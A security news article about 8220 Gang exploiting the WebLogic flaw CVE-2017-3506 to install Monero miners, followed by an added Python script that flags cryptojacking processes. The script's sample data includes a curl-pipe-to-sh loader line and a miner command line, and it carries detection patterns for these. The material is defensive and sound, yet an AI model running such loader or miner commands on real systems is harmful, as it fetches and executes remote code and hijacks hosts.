The notorious cryptojacking group 8220 Gang has been spotted weaponizing a six-year-old security flaw in Oracle WebLogic servers to ensnare vulnerable instances into a botnet and distribute cryptocurrency mining malware.
The flaw, CVE-2017-3506, lies in the WLS Security component of WebLogic Server and lets an unauthenticated attacker with HTTP access to the server execute arbitrary commands by sending a specially crafted XML document, giving them access to sensitive data or control of the whole host. Oracle shipped a fix in its April 2017 Critical Patch Update.
Because the flaw is reachable without credentials, exploitation needs no user interaction: the group targets internet-exposed WebLogic instances directly rather than relying on phishing or drive-by downloads. Once a server is compromised, the group installs a cryptocurrency miner that consumes the host's CPU to mine Monero, a privacy-focused cryptocurrency. The mining load noticeably degrades application performance and can leave the server unstable.
8220 Gang, named for the port 8220 its early command-and-control traffic used, has been active since at least 2017 and is one of the most persistent cryptojacking crews, known for opportunistically exploiting exposed web and cloud servers shortly after public exploits become available.
Organizations can protect themselves from 8220 Gang and other cryptojacking groups by applying Oracle's Critical Patch Updates promptly (the fix for CVE-2017-3506 has been available since April 2017), keeping WebLogic's administrative and web-service endpoints off the public internet or behind a firewall that restricts access to known sources, and running endpoint protection that detects known miner binaries.
Organizations should also watch for the signs of a cryptojacking attack: a sudden, sustained rise in CPU usage, degraded application performance, unfamiliar processes running from temporary directories, and outbound connections to mining pools.
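The following triage script is an added example, not tooling from the original article or from any 8220 Gang research. It turns the symptoms above into a quick host check: it parses `ps -eo pid,pcpu,user,args --no-headers` output (a constructed sample is embedded so it runs offline) and flags processes that burn CPU above a threshold, carry common miner command-line indicators, run from world-writable directories, or look like download-and-execute loaders. The indicator list, the 80% threshold and the sample process lines are assumptions chosen for illustration, not values from the page.

```python
"""Triage helper for the cryptojacking symptoms described above.

Added example, not code from the original article. Parses the output of
`ps -eo pid,pcpu,user,args --no-headers` and flags suspicious processes.
The indicator strings, loader pattern and CPU threshold are assumptions.
"""
import re

# Constructed sample of `ps -eo pid,pcpu,user,args --no-headers` output on
# a WebLogic host. None of these command lines come from the page.
SAMPLE_PS_OUTPUT = """\
    1  0.0 root     /sbin/init
  842  1.2 oracle   /u01/jdk/bin/java -Dweblogic.Name=AdminServer weblogic.Server
 2217 97.5 oracle   /tmp/.x/kswapd0 -o stratum+tcp://pool.example:3333 --donate-level 1
 2305 45.0 oracle   /usr/bin/python3 /opt/backup/rotate.py
 2410  0.3 oracle   /bin/bash -c curl -fsSL http://198.51.100.7/ldr.sh | sh
"""

# Substrings that commonly appear on a miner's command line.
# Assumption: a short illustrative list, not an exhaustive signature set.
MINER_INDICATORS = (
    "xmrig",
    "stratum+tcp://",
    "stratum+ssl://",
    "--donate-level",
    "minerd",
    "cryptonight",
)

# Download-and-execute shape typical of loader scripts that fetch a miner
# after exploitation (assumption; pattern chosen for illustration).
LOADER_PATTERN = re.compile(r"(curl|wget)\b.*\|\s*(ba)?sh\b")

# Binaries started from world-writable directories deserve a look; miners
# are often dropped there under kernel-thread-like names (assumption).
WRITABLE_DIR_PATTERN = re.compile(r"/(tmp|dev/shm|var/tmp)/")

CPU_THRESHOLD = 80.0  # percent of one core; assumption


def parse_ps(output):
    """Parse `ps -eo pid,pcpu,user,args --no-headers` lines into dicts."""
    procs = []
    for line in output.splitlines():
        parts = line.split(None, 3)
        if len(parts) < 4:
            continue  # malformed or empty line; skip it
        pid, pcpu, user, args = parts
        procs.append({"pid": int(pid), "pcpu": float(pcpu),
                      "user": user, "args": args})
    return procs


def flag_suspicious(procs, cpu_threshold=CPU_THRESHOLD):
    """Return (pid, reason) tuples for processes worth a closer look."""
    findings = []
    for p in procs:
        reasons = []
        if p["pcpu"] >= cpu_threshold:
            reasons.append("cpu %.1f%% >= %.0f%%" % (p["pcpu"], cpu_threshold))
        lowered = p["args"].lower()
        hits = [i for i in MINER_INDICATORS if i in lowered]
        if hits:
            reasons.append("miner indicators: " + ", ".join(hits))
        if LOADER_PATTERN.search(p["args"]):
            reasons.append("download-and-execute loader")
        if WRITABLE_DIR_PATTERN.match(p["args"]):
            reasons.append("binary running from world-writable directory")
        if reasons:
            findings.append((p["pid"], "; ".join(reasons)))
    return findings


if __name__ == "__main__":
    # Replace SAMPLE_PS_OUTPUT with subprocess output of the ps command
    # above to run this against a live host.
    for pid, reason in flag_suspicious(parse_ps(SAMPLE_PS_OUTPUT)):
        print("PID %d: %s" % (pid, reason))
```

A high-CPU hit on its own is not proof of mining (a legitimate batch job can sit at 100%), and miners frequently rename themselves to look like kernel threads, so treat each finding as a lead: confirm it by checking the process's binary path, its parent process, and whether it holds outbound connections to mining-pool ports.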